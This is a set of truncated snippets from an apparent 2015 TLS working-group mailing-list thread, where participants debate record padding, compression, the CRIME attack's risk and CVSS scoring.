On Fri 2015-10-02 12:24:24 -0400, Martin Rex wrote:
> The value of real padding is highly dependent of whether and how it
> will actually get used, and is far from automatic.
Sure, but we have no existing mechanism to do that in TLS 1.2 or
earlier. We need the mechanism before anyone can establis
On Sat, Oct 03, 2015 at 12:02:38PM -0400, Daniel Kahn Gillmor wrote:
> On Fri 2015-10-02 12:24:24 -0400, Martin Rex wrote:
>
> > But the collateral damage is that you break stuff that feeds on the
> > outer record layer structure and state, which can easily push adoption
> > of TLSv1.3 from the 5-
On 2015/10/02, at 22:59, Roland Zink wrote:
> Browsers are not a concern as they already have their own comp/decomp codes.
> HTTP/1 can compress content (Content-encoding and transfer-encoding) and
> HTTP2 has additional header compression.
>
> Regards,
> Roland
>
I see,
but contrary,
tls is
On 2015/10/03, at 0:24, Salz, Rich wrote:
>
>> 1) We know CRIME threat, but it can not be risk for everyone.
>> e.g., CVSS v2 Base Score: 2.6 (LOW)
>
> CVSS isn't always appropriate; CVSS2 called Heartbleed a 5; CVS v3 called it
> 7.5
>
We know it, but one of indicators.
How can you say the
On Sat, Oct 3, 2015 at 3:36 PM, takamichi saito
wrote:
>
> On 2015/10/02, at 22:59, Roland Zink wrote:
>
> > Browsers are not a concern as they already have their own comp/decomp
> codes. HTTP/1 can compress content (Content-encoding and transfer-encoding)
> and HTTP2 has additional header compre
> On Oct 4, 2015, at 1:44 AM, takamichi saito wrote:
>
>
> On 2015/10/03, at 0:24, Salz, Rich wrote:
>
>>
>>> 1) We know CRIME threat, but it can not be risk for everyone.
>>> e.g., CVSS v2 Base Score: 2.6 (LOW)
>>
>> CVSS isn't always appropriate; CVSS2 called Heartbleed a 5; CVS v3 called
